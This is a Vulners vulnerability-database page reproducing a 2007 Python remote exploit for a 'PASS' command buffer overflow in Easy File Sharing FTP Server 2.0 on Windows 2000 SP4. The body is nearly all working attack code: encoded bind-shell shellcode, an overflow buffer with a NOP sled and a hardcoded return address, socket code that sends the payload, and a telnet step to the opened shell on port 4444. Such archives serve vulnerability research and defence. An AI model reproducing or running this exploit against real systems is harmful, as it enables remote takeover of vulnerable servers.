Vulners
Lucene search
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x4b\x38\x4e\x37"
shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58"
shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34"
shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d"
shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x58"
shellcode += "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x47\x37\x43\x57"
shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x31"
shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"
shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55"
shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x4a\x36\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x44\x4e\x32"
shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x46"
shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
print response
# At the time of overflow EBX points into our shellcode
payload = 'A' * 2553
# NOP's pad with a 15 byte jump over some junk and the RET address
# Jumps into our shellcode
payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f'
# Address of 'call ebx' from kernel32.dll SP4
payload += struct.pack('<L', 0x7C577B03)
# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll
# But this one is not very reliable like Win2K SP4
#payload += struct.pack('<L', 0x71AB1269)
payload += '\x90' * 83
payload += shellcode
user = 'USER anonymous\r\n'
tsock.send(user)
response = tsock.recv(1024)
print response
passwd = 'PASS \x2c' + payload + '\r\n'
tsock.send(passwd)
response = tsock.recv(1024)
print response
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)
# milw0rm.com [2007-03-26]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4